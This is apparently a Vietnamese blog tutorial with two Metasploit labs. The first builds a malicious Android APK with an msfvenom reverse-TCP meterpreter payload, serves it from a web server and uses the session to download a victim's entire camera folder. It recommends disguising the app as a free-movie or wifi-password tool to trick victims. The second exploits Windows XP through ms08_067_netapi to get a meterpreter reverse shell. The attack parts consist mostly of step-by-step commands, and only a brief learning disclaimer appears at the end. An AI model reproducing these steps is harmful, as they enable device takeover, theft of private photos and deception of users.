h3LLo anh em! Hack mãi web rồi, ta lại chuyển qua hack mobile, haha.....Hôm nay mình cùng các bạn tìm hiểu về thằng metasploit.
Vậy Metasploit là gì?
- Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Kiến trúc metasploit sẽ như sau:
Thành phần trong kiến trúc:
- REX: thư viện cơ bản cho hầu hết các nhiệm vụ, xử lý các cổng kết nối, giao thức, chuyển đổi văn bản, HTTP, BASE64.
- MSF::CORE: cung cấp các API cơ bản, xác định khung Metasploit.
- MSF::BASE: cung cấp các API thân thiện, các API đơn giản hóa để sử dụng trong khung.
Hehe, đá tý lý thuyết thế thôi, anh em triển khai theo đúng tiêu đề blog nhỉ.
Lab 1: Đánh cắp dữ liệu trên điện thoại Android sử dụng fw Metasploit.
Chuẩn bị: 1 máy ảo chạy hệ điều hành kali linux và 1 máy ảo chạy hệ điều hành android.
- Đầu tiên ta kiểm tra địa chỉ ip của máy ảo chạy Kali Linux và kích hoạt máy chủ webserver.
Ok, giờ tạo ứng dụng android độc hại và tải lên máy chủ webserver vừa start.
Lệnh thực hiện:
msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.207.135 LPORT=4444 R> /var/www/html/quangat04.apk
Tiếp theo anh em khởi chạy framework metasploit và thiết lập chế độ lắng nghe khi máy nạn nhân có khởi động ứng dụng độc hại đã tạo ở trên.
Lệnh chạy metasploit: msfconsole
Lệnh lắng nghe phiên ứng dụng độc hại khi máy nạn nhân chạy ứng dụng:
Use multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
Set LHOST 192.168.207.135
Set LPORT 4444
Exploit
Tiến hành cài đặt file này ở máy ảo android và chạy dưới dạng ứng dụng (yêu cầu cấp quyền truy cập).
Trên thực tế ứng dụng độc hại này có thể lừa nạn nhân bằng các vỏ bọc của ứng dụng tiện ích như: xem phim miễn phí, xem mật khẩu wifi hàng xóm, đọc truyện miễn phí… để lừa nạn nhân tải về vài sử dụng. Hoặc kẻ tấn công bằng cách nào đó cài trực tiếp vào máy nạn nhân.
Sau đó tiến hành cài đặt và mở ứng dụng
Khi nạn nhân mở ứng dụng, bên máy ảo kali linux ngay lập tức bắt được phiên làm việc ứng dụng của nạn nhân.
Truy cập vào phiên làm việc này bằng câu lệnh.
Sessions -i 1
Ở bước này chúng ta sẽ tiến hành đánh cắp toàn bộ thư mục ảnh có trong máy nạn nhân.
Thực hiện lệnh sau: download -a /sdcard/DCIM/Camera
Sau khi đánh cắp được toàn bộ thư mục Camera dữ liệu sẽ được lưu tại root bên máy ảo kali linux.
Ok. Chấm hết cho nạn nhân. :))
Lab 2: Tấn Công Windows XP bằng Metasploit
Mô hình lab:
Hệ điều hành Kali linux bản 64 bit của kẻ tấn công: Giả sử có địa chỉ IP là 172.16.100.2
Windows XP SP0: Giả sử có địa chỉ IP là 172.16.100.5.
Mục đích: sử dụng lỗ hỏng ms08_067_netapi và payload meterpreter để khai thác vào Windows XP.
Mục Tiêu: Qua bài này ta đã hiểu rõ hơn về cách mà Metasploit hoạt động, từ đó ta có thể dễ dàng tìm hiểu thêm về các exploit và payload khác để thực hiện tấn công. Ở bài viết tiếp theo của series này mình sẽ hướng dẫn về payload meterpreter để sử dụng điều khiển và chiếm quyền hệ thống của mục tiêu.
Các bước thực hiện:
- Bước 1: Chọn exploit và thiết lập tham số:
Trước tiên thì ta hãy dùng quét phiên bản windows cũng qua lỗ hỏng smb.
Lệnh: msf > use auxiliary/scanner/smb/smb_version
Xem các thiết lập cần thiết cho exploit này.
Lệnh: msf auxiliary(smb_version) > show options
Bạn nhìn thấy, yêu cầu tham số RHOSTS phải có (cột Required là yes), và cột Current Setting còn trống vì vậy ta phải thiết lập cho nó. Mục tiêu tấn công của ta là máy ảo Windows XP, vì vậy hãy điền IP của nó vào.
Lệnh: msf auxiliary(smb_version) > set RHOSTS 172.16.100.5
Và bắt đầu quét:
Lệnh: msf auxiliary(smb_version) > exploit
Vậy là ta đã có được phiên bản hệ điều hành của mục tiêu: Windows XP SP0 / 1 (language:English).
- Bước 2: Sử dụng exploit ms08_067_netapi
Tiếp theo ta sẽ thực hiện tấn công qua exploit ms08_067_netapi:
Lệnh: msf auxiliary(smb_version) > use exploit/windows/smb/ms08_067_netapi
Xem các tham số cần thiết cho exploit này:
Lệnh: msf exploit(ms08_067_netapi) > show options
Tham số RHOST được yêu cầu chính là địa chỉ của mục tiêu:
Lệnh: msf exploit(ms08_067_netapi) > set RHOST 172.16.100.5
- Bước 3: Chọn payload và thiết lập tham số
Sau khi thiếp lập xong hãy kiểm tra lại, và chọn một payload. Mình sẽ sử dụng payload meterpreter/reverse_tcp:
Lệnh: msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Lệnh: msf exploit(ms08_067_netapi) > show options
Thiết lập tham số LHOST là máy đang chạy Metasploit.
Lệnh: msf exploit(ms08_067_netapi) > set LHOST 172.16.100.2
- Bước 4: Xác định mục tiêu tấn công:
Lệnh: msf exploit(ms08_067_netapi) > show targets
Ở trên ta không tìm thấy cái tùy chọn đúng như phiên bản hệ điều hành có được ở rên, tuy nhiên có cái lựa chọn Windows XP SP0/SP1 Universal là gần giống, vậy ta cứ để Automatic Targeting:
Lệnh: msf exploit(ms08_067_netapi) > set target 0
- Bước 5: Bắt đầu cho chạy exploit
Lệnh: msf exploit(ms08_067_netapi) > exploit
Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn, và lúc này là meterpreter shell, mình sẽ hướng dẫn sử dụng payload này ở phần sau, ta hãy thử vài lệnh nào!
- Bước 6: Thử sử dụng payload
Kiểm tra các session đang chạy:
Để xem lại các session đang mở ta hãy gõ:
Lệnh: msf exploit(ms08_067_netapi) > sessions
Mở lại session:
Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì ta hãy dùng lệnh:
Lệnh: msf exploit(ms08_067_netapi) > sessions -i <ID>
Bước 7: Thoát ra
Và cuối cùng tắt session hay thoát khỏi Metasploit ta dùng exit:
Ok. Như vậy mình đã trình bày 2 bài lab nhé. Bye ae. Mọi người có gì góp ý có thể bình luận phía dưới...
Thực hiện demo: Đồng Văn Quang, Hoàng Trọng Thắng
Sưu tầm tài liệu: Nguyễn Đăng Hải, Nguyễn Hải Đăng
Sưu tầm tài liệu: Nguyễn Đăng Hải, Nguyễn Hải Đăng
Bài viết mang tính chất học tập, học hỏi. demo, pentesting chủ yếu, không có ý định xấu, không khuyến khích thực hiện với bất kì mục đích không tốt nào?
0 Comment: